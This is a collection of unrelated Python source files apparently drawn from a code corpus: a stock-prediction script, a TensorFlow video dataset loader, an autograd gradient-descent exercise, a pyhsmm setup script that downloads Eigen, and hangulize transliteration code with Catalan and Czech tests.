positiveSim=hisDf.iloc[hisSim[hisSim>0].index]['PctChg']
if onlyPositiveCorr:
return positiveSim.median()
else:
#negtiveSim=hisDf.iloc[hisSim[hisSim<0].index+lookAheadDays]['Close'].values/hisDf.iloc[hisSim[hisSim<0].index]['Close']-1
negtiveSim=hisDf.iloc[hisSim[hisSim<0].index]['PctChg']
negtiveSim*=-1
sim = pd.concat([positiveSim, negtiveSim])
return sim.median()
def test(maDf, testSize=50, lookAheadDays=3, windowSize=20, minCorr=0.9, onlyPositiveCorr=True):
right = 0.0
unpredicable = 0.0
for i in range(-testSize-lookAheadDays,-lookAheadDays,1):
testDf=maDf[:i]
predictedChg = predict(testDf, lookAheadDays, windowSize, minCorr, onlyPositiveCorr)
length = len(maDf)
#Close are already MAed, may be not suitable to use
#realChg = maDf.at[length+i+lookAheadDays,'Close']/maDf.at[length+i,'Close'] -1
realChg = maDf.at[length+i+lookAheadDays,'PctChg']
dt = maDf.at[length+i, 'TradeDate']
predictDt = maDf.at[length+i+lookAheadDays, 'TradeDate']
print 'today:%s %s predict:%s %s predict chg:%s real chg:%s' % (dt,maDf.at[length+i,'OrigClose'], predictDt,maDf.at[length+i+lookAheadDays,'OrigClose'], predictedChg, realChg)
if str(predictedChg) == 'nan' or predictedChg is np.nan:
unpredicable += 1
if predictedChg*realChg > 0:
right += 1
return unpredicable, right
def prepare_data(ticker, maMethod='ema', maPeriod=20, lookAheadDays=3, start='', end='', useYahoo=False):
if not end:
now = datetime.datetime.now()
end = now.strftime('%Y%m%d')
if not start:
start = (datetime.datetime.strptime(end, '%Y%m%d')+datetime.timedelta(days=-365*5)).strftime('%Y%m%d')
if useYahoo:
from zipline.utils.factory import load_bars_from_yahoo
tmpStart = datetime.datetime.strptime(start, '%Y%m%d')
ystart = datetime.datetime(tmpStart.year, tmpStart.month, tmpStart.day, 0,0,0,0,pytz.utc)
tmpEnd = datetime.datetime.strptime(end, '%Y%m%d')
yend = datetime.datetime(tmpEnd.year, tmpEnd.month, tmpEnd.day, 0,0,0,0,pytz.utc)
stockDf = load_bars_from_yahoo(stocks=[ticker], start=ystart, end=yend, adjusted=False)[ticker].reset_index()
stockDf['TradeDate'] = stockDf['Date'].apply(lambda x:x.strftime('%Y%m%d'))
stockDf = stockDf[['open', 'high', 'low', 'close', 'volume','TradeDate']]
stockDf.rename(columns={'open':'Open','high':'High','low':'Low','close':'Close','volume':'Volume'}, inplace=True)
else:
sys.path.insert(0, '/home/jinwb/code/IIA/jsforesight/datamodel')
from TickerEodModel import TickerEodModel
eodM=TickerEodModel('testEventDbConfigKey')
stockDf = eodM.get_eod(ticker,start,end)
emaDf=pd.DataFrame(index=stockDf.index)
emaDf['OrigClose']=stockDf['Close']
emaDf['OrigVolume']=stockDf['Volume']
emaDf['TradeDate']=stockDf['TradeDate']
emaDf['PctChg'] = stockDf['Close'].pct_change(periods=lookAheadDays)
emaDf['index']=emaDf.index
if maMethod.lower() == 'ema':
emaDf['Close']=ta.EMA(stockDf['Close'].values, maPeriod)
emaDf['Volume']=ta.EMA(stockDf['Volume'].values, maPeriod)
else:
emaDf['Close']=ta.MA(stockDf['Close'].values, maPeriod)
emaDf['Volume']=ta.MA(stockDf['Volume'].values, maPeriod)
print emaDf.tail(10)
return emaDf
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='predict/test using similarity-prediction')
parser.add_argument('-t', '--ticker', action='store', default='000001.SZ', help='tickers to predict/test')
parser.add_argument('-m', '--mamethod', action='store', choices=['ema','ma'], default='ema', help='ma method to pre-process the Close/Volume')
parser.add_argument('-p', '--maperiod', action='store', type=int, default=20, help='period to ma Close/Volume')
parser.add_argument('-w', '--window', action='store', type=int, default=20, help='window size to match')
parser.add_argument('-a', '--lookahead', action='store', type=int, default=3, help='days to lookahead when predict')
parser.add_argument('-c', '--mincorr', action='store', type=float, default=0.9, help='days to lookahead when predict')
parser.add_argument('-s', '--testsize', action='store', type=int, default=50, help='period to test')
parser.add_argument('-b', '--begin', action='store', type=str, default='19900101', help='start of the market data')
parser.add_argument('-e', '--end', action='store', type=str, default='29900101', help='end of the market data')
parser.add_argument('-o', '--onlypositivecorr', action='store_true', default=False)
parser.add_argument('-u', '--usamarket', action='store_true', default=False)
args = parser.parse_args()
df = prepare_data(args.ticker, args.mamethod, args.maperiod, lookAheadDays=args.lookahead, start=args.begin, end=args.end, useYahoo=args.usamarket)
if args.testsize<=0:
pred = predict(df, args.lookahead, args.window, args.mincorr, args.onlypositivecorr)
print 'today:%s predict %s days later chg:%s' % (df.at[len(df)-1, 'TradeDate'], args.lookahead, pred)
else:
unpredicted, right = test(df, args.testsize, args.lookahead, args.window, args.mincorr, args.onlypositivecorr)
print 'ticker:%s, ma period:%s, window:%s, lookahead:%s ma method:%s, testSize: %s predicts:%s, Right Rate: %s, Total Rate:%s' % (args.ticker, args.maperiod, args.window, args.lookahead, args.mamethod, args.testsize,args.testsize-unpredicted, right/(args.testsize-unpredicted), right/args.testsize)
``` |
{
"source": "jinwchoi/M-PACT",
"score": 3
} |
#### File: M-PACT/utils/load_dataset_tfrecords.py
```python
import os
import numpy as np
import tensorflow as tf
from tensorflow.python.training import queue_runner
def load_dataset(model, num_gpus, batch_size, output_dims, input_dims, seq_length, size, base_data_path, dataset, istraining, clip_length, video_offset, clip_offset, num_clips, clip_stride, video_step, preproc_debugging=0, shuffle_seed=0, verbose=True):
"""
Function load dataset, setup queue and read data into queue
Args:
:model: tf-activity-recognition framework model object
:num_gpus: Number of gpus to use when training
:batch_size: Number of clips to load into the model each step.
:input_dims: Number of frames used in input
:output_dims: Integer number of classes in current dataset
:seq_length: Length of output sequence expected from LSTM
:size: List detailing height and width of frame
:dataset: Name of dataset being processed
:base_data_path: Full path to root directory containing datasets
:istraining: Boolean variable indicating training/testing phase
:clip_length: Length of clips to cut video into, -1 indicates using the entire video as one clip')
:clip_offset: "none" or "random" indicating where to begin selecting video clips
:num_clips: Number of clips to break video into
:clip_stride: Number of frames that overlap between clips, 0 indicates no overlap and negative values indicate a gap of frames between clips
Return:
Input data tensor, label tensor and name of loaded data (video/image)
"""
# Get a list of tfrecords file names from which to pull videos
filenames = []
number_of_tfrecords = 0
for f in os.listdir(base_data_path):
filenames.append(os.path.join(base_data_path,f))
number_of_tfrecords += 1
# END FOR
if verbose:
print "Number of records available: ", number_of_tfrecords
# END IF
# Create Queue which will read in videos num_gpus at a time (Queue seeded for repeatability of experiments)
tfrecord_file_queue = tf.train.string_input_producer(filenames, shuffle=istraining, name='file_q', seed=shuffle_seed)
# Errors occurring in a model's preprocessing function are not properly traced back when using 'clip_q'.
# If an error occurs stating that "fifo_queue has insufficient elements", then set '--preprocDebugging 1'
# For debugging, a batch_size other than 1 will cause instability
if preproc_debugging:
input_data_tensor, labels_tensor, names_tensor, video_step_tensor, alpha_tensor = _load_video(model, output_dims, input_dims, seq_length, size, base_data_path, dataset, istraining, clip_length, video_offset, clip_offset, num_clips, clip_stride, tfrecord_file_queue, video_step)
else:
tf.set_random_seed(0) # To ensure the numbers are generated for temporal offset consistently
# Number of threads to be used
thread_count = 1
# Initialize queue that will contain multiple clips of the format [[clip_frame_count, height, width, channels], [labels_copied_seqLength], [name_of_video]]
clip_q = tf.FIFOQueue(num_gpus*batch_size*thread_count, dtypes=[tf.float32, tf.int32, tf.string, tf.float32, tf.float32], shapes=[[input_dims, size[0], size[1], 3],[seq_length],[],[],[]])
# Attempts to load num_gpus*batch_size number of clips into queue, if there exist too many clips in a video then this function blocks until the clips are dequeued
enqueue_op = clip_q.enqueue_many(_load_video(model, output_dims, input_dims, seq_length, size, base_data_path, dataset, istraining, clip_length, video_offset, clip_offset, num_clips, clip_stride, tfrecord_file_queue, video_step))
# Initialize the queuerunner and add it to the collection, this becomes initialized in train_test_TFRecords_multigpu_model.py after the Session is begun
qr = tf.train.QueueRunner(clip_q, [enqueue_op]*num_gpus*thread_count)
queue_runner.add_queue_runner(qr)
# Dequeue the required number of clips so that each gpu contains batch_size clips
input_data_tensor, labels_tensor, names_tensor, video_step_tensor, alpha_tensor = clip_q.dequeue_many(num_gpus*batch_size)
# END IF
# Track scalar value defined in a models preprocessing function in a class variable called 'store_alpha'
if hasattr(model, 'store_alpha'):
model.store_alpha = alpha_tensor
model.add_track_variables('Parameterization_Variables', model.store_alpha)
# END IF
return input_data_tensor, labels_tensor, names_tensor
def _load_video(model, output_dims, input_dims, seq_length, size, base_data_path, dataset, istraining, clip_length, video_offset, clip_offset, num_clips, clip_stride, tfrecord_file_queue, video_step):
"""
Function to load a single video and preprocess its' frames
Args:
:model: tf-activity-recognition framework model object
:input_dims: Number of frames used in input
:output_dims: Integer number of classes in current dataset
:seq_length: Length of output sequence expected from LSTM
:size: List detailing height and width of frame
:dataset: Name of dataset being processed
:base_data_path: Full path to root directory containing datasets
:istraining: Boolean variable indicating training/testing phase
:clip_length: Length of clips to cut video into, -1 indicates using the entire video as one clip')
:clip_offset: "none" or "random" indicating where to begin selecting video clips
:num_clips: Number of clips to break video into
:clip_stride: Number of frames that overlap between clips, 0 indicates no overlap and -1 indicates clips are randomly selected and not sequential
:tfrecord_file_queue: A queue containing remaining videos to be loaded for the current epoch
Return:
Input data tensor, label tensor and name of loaded data (video/image)
"""
# Dequeue video data from queue and convert it from TFRecord format (int64 or bytes)
features = _read_tfrecords(tfrecord_file_queue)
frames = tf.cast(features['Frames'], tf.int32)
height = tf.cast(features['Height'], tf.int32)
width = tf.cast(features['Width'], tf.int32)
channel = tf.cast(features['Channels'], tf.int32)
label = tf.cast(features['Label'], tf.int32)
name = features['Name']
# Shape [frames, height, width, channels]
input_data_tensor = tf.reshape(tf.decode_raw(features['Data'], tf.uint8), tf.stack([frames,height,width,channel]))
# BGR to RGB
input_data_tensor = input_data_tensor[...,::-1]
# Reduction in fps to 25 for HMDB51 dataset
if ('HMDB51' in dataset) or ('MIT' in dataset):
input_data_tensor, frames, indices = _reduce_fps(input_data_tensor, frames)
# END IF
# If clip_length == -1 then the entire video is to be used as a single clip
if clip_length <= 0:
clips = [input_data_tensor]
clips = tf.to_int32(clips) # Usually occurs within _extract_clips
else:
clips = _extract_clips(input_data_tensor, frames, num_clips, clip_offset, clip_length, video_offset, clip_stride, height, width, channel)
# END IF
""" Reference of shapes:
clips shape: [num_clips, clip_length or frames, height, width, channels]
model.preprocess_tfrecords input shape: [clip_length or frames, height, width, channels]
"""
# Call preprocessing function related to model chosen that preprocesses each clip as an individual video
if hasattr(model, 'store_alpha'):
clips_tensor = tf.map_fn(lambda clip: model.preprocess_tfrecords(clip[0], tf.shape(clip[0])[0], height, width,channel, input_dims, output_dims, seq_length, size, label, istraining, video_step),
(clips, np.array([clips.get_shape()[0].value]*clips.get_shape()[0].value)), dtype=(tf.float32, tf.float32))
alpha_tensor = clips_tensor[1]
clips_tensor = clips_tensor[0]
else:
clips_tensor = tf.map_fn(lambda clip: model.preprocess_tfrecords(clip, tf.shape(clip)[0], height, width,channel, input_dims, output_dims, seq_length, size, label, istraining, video_step),
clips, dtype=tf.float32)
alpha_tensor = np.array([1.0]*clips.get_shape()[0].value)
# END IF
num_clips = tf.shape(clips_tensor)[0]
video_step = tf.assign_add(video_step, 1)
labels_tensor = tf.tile( [label], [seq_length])
names_tensor = tf.tile( [name], [num_clips])
video_step_tensor = tf.tile([video_step], [num_clips])
""" Reference of shape:
clips_tensor shape: [num_clips, input_dims, size[0], size[1], channels]
"""
return [clips_tensor, tf.tile([labels_tensor], [num_clips,1]), names_tensor, video_step_tensor, alpha_tensor]
def _read_tfrecords(filename_queue):
"""
Function that reads and returns the tfrecords of a selected dataset one at a time
Args:
:filename_queue: A queue of all filenames within a dataset
Return:
Dictionary containing features of a single sample
"""
feature_dict = {}
reader = tf.TFRecordReader()
_, serialized_example = reader.read(filename_queue)
feature_dict['Label'] = tf.FixedLenFeature([], tf.int64)
feature_dict['Data'] = tf.FixedLenFeature([], tf.string)
feature_dict['Frames'] = tf.FixedLenFeature([], tf.int64)
feature_dict['Height'] = tf.FixedLenFeature([], tf.int64)
feature_dict['Width'] = tf.FixedLenFeature([], tf.int64)
feature_dict['Channels'] = tf.FixedLenFeature([], tf.int64)
feature_dict['Name'] = tf.FixedLenFeature([], tf.string)
features = tf.parse_single_example(serialized_example, features=feature_dict)
return features
def _extract_clips(video, frames, num_clips, clip_offset, clip_length, video_offset, clip_stride, height, width, channel):
"""
Function that extracts clips from a video based off of clip specifications
Args:
:video: The video tensor that needs to be split into clips
:frames: The number of frames of the video
:num_clips: Number of clips to break video into
:clip_offset: "none" or "random" indicating where to begin selecting video clips
:clip_length: Length of clips to cut video into, -1 indicates using the entire video as one clip')
:clip_stride: Number of frames that overlap between clips, 0 indicates no overlap and negative values indicate a gap of frames between clips
Return:
A tensor containing the clip(s) extracted from the video (shape [clip_number, clip_frames, height, width, channel])
"""
if video_offset == 'random':
video_start = tf.random_uniform([], maxval=frames-1, dtype=tf.int32)
else:
video_start = 0
if clip_offset == 'random':
video = tf.cond(tf.greater(clip_length, frames),
lambda: _loop_video_with_offset(video, video, 0, frames, height, width, channel, clip_length),
lambda: video)
clip_begin = tf.random_uniform([num_clips], minval=0, maxval=tf.shape(video)[0]-clip_length+1, dtype=tf.int32)
rs = tf.reshape(clip_begin, [num_clips,1,1,1])
video = tf.to_int32(video)
clips = tf.map_fn(lambda clip_start: video[clip_start[0][0][0]:clip_start[0][0][0]+clip_length], rs)
else:
if num_clips > 0:
frames_needed = clip_length + (clip_length-clip_stride) * (num_clips-1)
video = tf.cond(tf.greater(frames_needed, frames-video_start),
lambda: _loop_video_with_offset(video[video_start:,:,:,:], video, frames-video_start, frames, height, width, channel, frames_needed),
lambda: video[video_start:,:,:,:])
clip_begin = tf.range(0, frames_needed, delta = clip_length-clip_stride)[:num_clips]
rs = tf.reshape(clip_begin, [num_clips,1,1,1])
video = tf.to_int32(video)
clips = tf.map_fn(lambda clip_start: video[clip_start[0][0][0]:clip_start[0][0][0]+clip_length], rs)
else:
# Get total number of clips possible given clip_length stride and offset
# Need minimum one clip: loop video until at least have clip_length frames
video = tf.cond(tf.greater(clip_length, frames-video_start),
lambda: _loop_video_with_offset(video[video_start:,:,:,:], video, frames-video_start, frames, height, width, channel, clip_length+video_start),
lambda: video[video_start:,:,:,:])
number_of_clips = tf.cond(tf.greater(clip_length, frames-video_start),
lambda: 1,
lambda: (frames-video_start-clip_length) / (clip_length - clip_stride) + 1)
clip_begin = tf.range(0, number_of_clips*(clip_length-clip_stride), delta=clip_length-clip_stride)[:num_clips]
rs = tf.reshape(clip_begin, [num_clips,1,1,1])
video = tf.to_int32(video)
clips = tf.map_fn(lambda clip_start: video[clip_start[0][0][0]:clip_start[0][0][0]+clip_length], rs)
return clips
def _loop_video_with_offset(offset_tensor, input_data_tensor, offset_frames, frames, height, width, channel, footprint):
"""
Loop the video the number of times necessary for the number of frames to be > footprint
Args:
:offset_tensor: Raw input data from offset frame number
:input_data_tensor: Raw input data
:frames: Total number of frames
:height: Height of frame
:width: Width of frame
:channel: Total number of color channels
:footprint: Total length of video to be extracted before sampling down
Return:
Looped video
"""
loop_factor = tf.cast(tf.add(tf.divide(tf.subtract(footprint, offset_frames), frames), 1), tf.int32)
loop_stack = tf.stack([loop_factor,1,1,1])
input_data_tensor = tf.tile(input_data_tensor, loop_stack)
reshape_stack = tf.stack([tf.multiply(frames, loop_factor),height,width,channel])
input_data_looped = tf.reshape(input_data_tensor, reshape_stack)
output_data = tf.concat([offset_tensor, input_data_looped], axis = 0)
return output_data
def _reduce_fps(video, frame_count):
"""
Function that drops frames to match 25 pfs from 30 fps captured videos
Args:
:video: Tensor containing video frames
:frame_count: Total number of frames in the video
Return:
Video with reduced number of frames to match 25fps
"""
# Convert from 30 fps to 25 fps
remove_count = tf.cast(tf.ceil(tf.divide(frame_count, 6)), tf.int32)
intermediate_frames = tf.multiply(remove_count, 5)
indices = tf.tile([0,1,2,3,4], [remove_count]) # [[0,1,2,3,4],[0,1,2,3,4]..]
indices = tf.reshape(indices, [intermediate_frames]) # [0,1,2,3,4,0,1,2,3,4,0,1,2....]
additions = tf.range(remove_count) # [0,1,2,3,4,5,6,....]
additions = tf.stack([additions, additions, additions, additions, additions]) # [[0,1,2,3,4,5,6...], [0,1,2,3,4,5,6..], [0,1..], [0,1,..], [0,1,...]]
additions = tf.transpose(additions) # [[0,0,0,0,0], [1,1,1,1,1], [2,2,2,2,2], ...]
additions = tf.reshape(additions, [intermediate_frames]) # [0,0,0,0,0,1,1,1,1,1,2,2,2,2,2,3,3,3,3,3....]
additions = tf.multiply(additions, 6) # [0,0,0,0,0,6,6,6,6,6,12,12,12,12,12,18,18,18,18,18....]
indices = tf.add(indices, additions) # [0,1,2,3,4,6,7,8,9,10,12,13,14,15,16,18,19....]
remove_count = tf.cond( tf.equal(frame_count, tf.multiply(remove_count, 6)),
lambda: remove_count,
lambda: tf.subtract(remove_count, 1))
output_frames = tf.subtract(frame_count, remove_count)
indices = tf.slice(indices, [0], [output_frames])
indices_to_keep = tf.reshape(indices, [output_frames])
output = tf.gather(video, indices_to_keep)
return output, output_frames, indices
def _error_loading_video():
"""
Prints that an error occured while loading the video, indicates that the clip_length was specified to be longer than a videos' frame count
Args:
Return:
returns an integer for tf.cond to function properly in _load_video()
"""
print "If an error occurs: The video loaded contains fewer frames than the specified clip length."
return 0
def load_dataset_without_preprocessing(base_data_path, dataset, istraining, vid_name, verbose=True):
"""
Function load dataset, setup queue and read data into queue without preprocessing the video
Args:
:base_data_path: Full path to root directory containing datasets
:dataset: Video dataset to load
:istraining: Boolean variable indicating training/testing phase
:vid_name: Name of video to load if desired
Return:
Input data tensor, label tensor and name of loaded data (video/image)
"""
# Get a list of tfrecords file names from which to pull videos
filenames = []
number_of_tfrecords = 0
for f in os.listdir(base_data_path):
filenames.append(os.path.join(base_data_path,f))
number_of_tfrecords += 1
# END FOR
if verbose:
print "Number of records available: ", number_of_tfrecords
if vid_name == "default":
# Create Queue which will read in videos num_gpus at a time (Queue seeded for repeatability of experiments)
tfrecord_file_queue = tf.train.string_input_producer(filenames, shuffle=istraining, name='file_q', seed=0)
else:
# Create Queue which will read in videos num_gpus at a time (Queue seeded for repeatability of experiments)
tfrecord_file_queue = tf.train.string_input_producer([os.path.join(base_data_path, f)], shuffle=istraining, name='file_q', seed=0)
tf.set_random_seed(0) # To ensure the numbers are generated for temporal offset consistently
# Number of threads to be used
thread_count = 1
# Dequeue video data from queue and convert it from TFRecord format (int64 or bytes)
features = _read_tfrecords(tfrecord_file_queue)
frames = tf.cast(features['Frames'], tf.int32)
height = tf.cast(features['Height'], tf.int32)
width = tf.cast(features['Width'], tf.int32)
channel = tf.cast(features['Channels'], tf.int32)
label = tf.cast(features['Label'], tf.int32)
name = features['Name']
# Shape [frames, height, width, channels]
input_data_tensor = tf.reshape(tf.decode_raw(features['Data'], tf.uint8), tf.stack([frames,height,width,channel]))
# BGR to RGB
input_data_tensor = input_data_tensor[...,::-1]
# Reduction in fps to 25 for HMDB51 dataset
if 'HMDB51' in dataset:
input_data_tensor, frames, indices = _reduce_fps(input_data_tensor, frames)
return input_data_tensor, label, name
``` |
{
"source": "jinwei14/Mathematics-for-Machine-Learning",
"score": 4
} |
#### File: Mathematics-for-Machine-Learning/CW1/tryAutoGrad.py
```python
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import autograd.numpy as np
import math
import matplotlib.pyplot as plt
from autograd import grad
# Thinly wrapped numpy
# Basically everything you need
B = np.array([[3, -1], [-1, 3]])
a = np.array([[1], [0]])
b = np.array([[0], [-1]])
def f1(x):
"""
this the function of f3
"""
f1 = np.transpose(x).dot(x) + np.transpose(x).dot(B).dot(x) - np.transpose(a).dot(x) + np.transpose(b).dot(x)
return f1
def grad_f1(x):
"""
4 marks
:param x: input array with shape (2, ) 2 row x column
:return: the gradient of f1, with shape (2, )
answer is gradient f(x) = (I+B)x -a -b =0
"""
x = x.reshape(2, 1)
#fx1 = 2**.dot(x) - matrix_a + matrix_b
fx1 = 2*(np.identity(2) + B).dot(x) - a + b
ans = fx1.reshape(2,)
return ans
def f2(x):
"""
this the function of f3
"""
x=x.reshape(2,1)
f2 = math.sin(np.transpose(x-a).dot(x-a)) + np.transpose(x-b).dot(B).dot(x-b)
return f2
def grad_f2(x):
"""
6 marks
:param x: input array with shape (2, )
:return: the gradient of f2, with shape (2, )
gradient f(x) = 2(x-a)Cos((x-a)T (x-a)) + 2B(x-b)
"""
x=x.reshape(2,1)
fx = 2*(x-a)*math.cos( np.transpose(x-a).dot(x-a))+ 2*B.dot(x-b)
# print(fx[1])
# ans = np.array(fx[0],fx[1])
fx = fx.reshape(2,)
return fx
def f3(x):
"""
this the function of f3
"""
x = x.reshape(2, 1)
part1 = np.exp(-np.dot((x - a).T, x-a))
part2 = np.exp(-np.dot (np.dot((x - b).T, B),(x-b)))
det = np.linalg.det(0.01 * np.identity(2) + np.dot(x, x.T))
part3 = 0.1 * np.log(det)
func3 = 1 - part1 - part2 + part3
return func3
def grad_f3(x):
"""
This question is optional. The test will still run (so you can see if you are correct by
looking at the testResults.txt file), but the marks are for grad_f1 and grad_f2 only.
Do not delete this function.
:param x: input array with shape (2, )
:return: the gradient of f3, with shape (2, )
"""
grad_f3 = grad(f3)
return grad_f3(x)
x= np.array([1,1])
#print(grad_f1(np.array( [ 1,-1 ])).shape )
#print(grad_f3(x))
print(f2(x))
# From calculation, it is expected that the local minimum occurs at x=9/4
cur_x = np.array([1, -1]) # The algorithm starts at x=1
gamma = 0.1 # step size multiplier
max_iters = 50 # maximum number of iterations
iters = 0 #iteration counter
x_gd = []
y_gd = []
z_gd = []
while (iters < max_iters):
x_gd.append(cur_x[0])
y_gd.append(cur_x[1])
z_gd.append(f3(cur_x))
prev_x = np.array([cur_x[0],cur_x[1]])
cur_x = prev_x - gamma * grad_f3(prev_x)
iters+=1
print("The local minimum occurs at", cur_x)
xlist = np.linspace(-0.25, 1, 50)
ylist = np.linspace(-1.0, 0, 50)
X,Y = np.meshgrid(xlist,ylist)
#new an array with all 0 inside
Z = np.zeros((50, 50))
for i in range(50):
for j in range(50):
Z[i][j] = f3(np.array([xlist[i],ylist[j]]))
print(Z)
plt.contour(X.T,Y.T, Z, 50, cmap = 'jet')
plt.colorbar()
plt.plot(x_gd, y_gd, color='green', marker='v', linestyle='dashed', linewidth=0.4, markersize=3 )
plt.show()
# Plot the surface.
# fig = plt.figure()
# ax = fig.gca(projection='3d')
#
# surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm,
# linewidth=0, antialiased=False)
#
# # Customize the z axis.
# ax.set_zlim(-1.01, 1.01)
# ax.zaxis.set_major_locator(LinearLocator(10))
# ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
#
# # Add a color bar which maps values to colors.
# fig.colorbar(surf, shrink=0.5, aspect=5)
#
# plt.show()
``` |
{
"source": "jinwensun111/pyhsmm",
"score": 2
} |
#### File: jinwensun111/pyhsmm/setup.py
```python
import shutil
import tarfile
from pathlib import Path
from urllib.request import urlretrieve
import numpy
import requests
from setuptools import Extension, setup
from Cython.Build import cythonize
def download_eigen(deps_dir):
deps_dir = Path(deps_dir)
deps_dir.mkdir(exist_ok=True)
# download Eigen if we don't have it in deps
# TODO: Can we cleanup this?
eigenurl = "https://gitlab.com/libeigen/eigen/-/archive/3.3.7/eigen-3.3.7.tar.gz"
eigenpath = deps_dir.joinpath("Eigen")
eigentarpath = deps_dir.joinpath("Eigen.tar.gz")
if not eigenpath.exists():
print("Downloading Eigen...")
r = requests.get(eigenurl)
with open(eigentarpath, 'wb') as f:
f.write(r.content)
with tarfile.open(eigentarpath, "r") as tar:
tar.extractall("deps")
thedir = next(deps_dir.glob("eigen-*"))
shutil.move(thedir.joinpath("Eigen"), eigenpath)
print("...done!")
def find_extensions(deps_dir):
extensions = []
for pyx in Path("pyhsmm").glob("**/*.pyx"):
ext_name = ".".join(pyx.with_suffix("").parts)
print(f"Extension {ext_name}: {pyx}")
extensions.append(
Extension(
ext_name,
sources=[str(pyx)],
include_dirs=[deps_dir, numpy.get_include()],
extra_compile_args=[
"-O3",
"-std=c++11",
"-DNDEBUG",
"-w",
"-DHMM_TEMPS_ON_HEAP",
],
)
)
return extensions
download_eigen("deps")
extensions = find_extensions("deps")
setup(
name="pyhsmm",
version="0.1.6",
description="Bayesian inference in HSMMs and HMMs",
author="<NAME>",
author_email="<EMAIL>",
url="https://github.com/mattjj/pyhsmm",
license="MIT",
packages=["pyhsmm", "pyhsmm.basic", "pyhsmm.internals", "pyhsmm.util"],
platforms="ALL",
keywords=[
"bayesian",
"inference",
"mcmc",
"time-series",
"monte-carlo",
"variational inference",
"mean field",
"vb",
],
install_requires=[
"matplotlib",
"numpy",
"scipy",
"pybasicbayes@git+https://github.com/maxmouchet/pybasicbayes.git",
],
ext_modules=cythonize(extensions),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Science/Research",
"Programming Language :: Python",
"Programming Language :: C++",
],
)
``` |
{
"source": "Jinwithyoo/han",
"score": 3
} |
#### File: hangulize/langs/__init__.py
```python
import os
import re
p = os.path
def list_langs():
"""Returns the supported language code list."""
ext = p.extsep + 'py'
init = '__init__' + ext
def _list_langs(prefix='', path=None):
path = path or p.dirname(__file__)
# helpers
name = lambda x: prefix + re.sub(re.escape(ext) + '$', '', x)
def is_lang(x):
if x.startswith(init):
return False
x = p.join(path, x)
return p.isdir(x) and p.isfile(p.join(x, init)) or \
p.isfile(x) and x.endswith(ext)
# find top-level language modules
langs = [name(x) for x in os.listdir(path) if is_lang(x)]
# find sub language modules
for lang in langs:
_path = p.join(path, lang)
if p.isdir(_path):
langs += _list_langs(prefix=lang + '.', path=_path)
langs.sort()
return langs
return _list_langs()
def get_list():
"""Deprecated with 0.0.6. Use :func:`hangulize.langs.list_langs`
instead.
"""
import warnings
warnings.warn('get_list() has been deprecated, use list_langs() instead',
DeprecationWarning)
return list_langs()
```
#### File: han/tests/cat.py
```python
from tests import HangulizeTestCase
from hangulize.langs.cat import Catalan
class CatalanTestCase(HangulizeTestCase):
lang = Catalan()
def test_people(self):
self.assert_examples({
'Arantxa': '아란차',
'<NAME>': '발렌티 알미랄',
'<NAME>': '자우메 바르투메우',
'Sergi Bruguera': '세르지 브루게라',
'<NAME>': '몬세라트 카발례',
'<NAME>': '산티아고 칼라트라바',
'<NAME>': '조안 캅데빌라',
'<NAME>': '조제프 카르네르',
'Pau Casals': '파우 카잘스',
'Lluís Companys': '류이스 콤파니스',
'<NAME>': '알렉스 코레자',
'<NAME>': '알베르트 코스타',
'<NAME>': '살바도르 달리',
'Salvador Espriu': '살바도르 에스프리우',
'Cesc Fàbregas': '세스크 파브레가스',
'Pau Gasol': '파우 가졸',
'<NAME>': '안토니 가우디',
'<NAME>': '조제프 과르디올라',
'<NAME>': '샤비 에르난데스',
'<NAME>': '라몬 률',
'<NAME>': '프란세스크 마시아 이 류사',
'<NAME>': '조안 마라갈',
'Ausiàs March': '아우지아스 마르크',
'<NAME>': '조아노트 마르토렐',
'<NAME>': '조안 미로',
'<NAME>': '제라르트 피케',
'<NAME>': '조제프 플라',
'<NAME>': '에우달 프라델',
'<NAME>': '카를레스 푸욜',
'<NAME>': '메르세 로도레다',
'<NAME>': '조르디 사발',
'<NAME>': '조안 마누엘 세라트',
'<NAME>': '조아킴 소롤랴',
'<NAME>': '안토니 타피에스',
'<NAME>': '조제프 타라델랴스',
'<NAME>': '조르디 타레스',
'<NAME>': '자신 베르다게르',
})
def test_places(self):
self.assert_examples({
'Alacant': '알라칸',
'Andorra': '안도라',
'Andorra la Vella': '안도라 라 벨랴',
'Barcelona': '바르셀로나',
'Berga': '베르가',
'Besalú': '베잘루',
'Catalunya': '카탈루냐',
'Cerdanya': '세르다냐',
'Conflent': '콘플렌',
'Eivissa': '에이비사',
'Elx': '엘시',
'Empúries': '엠푸리에스',
'Figueres': '피게레스',
'Girona': '지로나',
'Lleida': '례이다',
'Manresa': '만레자',
'Montjuïc': '몬주이크',
'Montserrat': '몬세라트',
'Osona': '오조나',
'Pallars': '팔랴르스',
'Pallars Jussà': '팔랴르스 주사',
'Pallars Sobirà': '팔랴르스 소비라',
'Palma': '팔마',
'Ribagorça': '리바고르사',
'Rosselló': '로셀료',
'Tarragona': '타라고나',
'Urgell': '우르젤',
'València': '발렌시아',
})
def test_miscellaneous(self):
self.assert_examples({
'Barça': '바르사',
'Camp Nou': '캄 노우',
'Canigó': '카니고',
'Espanyol': '에스파뇰',
'estel·lar': '에스텔라르',
'llengua': '롕과',
'modernisme': '모데르니즈메',
'Renaixença': '레나셴사',
'Sagrada Família': '사그라다 파밀리아',
})
```
#### File: han/tests/ces.py
```python
from tests import HangulizeTestCase
from hangulize.langs.ces import Czech
class CzechTestCase(HangulizeTestCase):
""" http://korean.go.kr/09_new/dic/rule/rule_foreign_0209.jsp """
lang = Czech()
def test_basic(self):
""" http://korean.go.kr/09_new/dic/rule/rule_foreign_0107.jsp """
self.assert_examples({
'barva': '바르바',
'obchod': '옵호트',
'dobrý': '도브리',
'jeřab': '예르자프',
'cigareta': '치가레타',
'nemocnice': '네모츠니체',
'nemoc': '네모츠',
'čapek': '차페크',
'kulečnik': '쿨레치니크',
'míč': '미치',
'dech': '데흐',
'divadlo': '디바들로',
'led': '레트',
"ďábel": '댜벨',
"loďka": '로티카',
"hruď": '흐루티',
'fík': '피크',
'knoflík': '크노플리크',
'gramofon': '그라모폰',
'hadr': '하드르',
'hmyz': '흐미스',
'bůh': '부흐',
'choditi': '호디티',
'chlapec': '흘라페츠',
'prach': '프라흐',
'kachna': '카흐나',
'nikdy': '니크디',
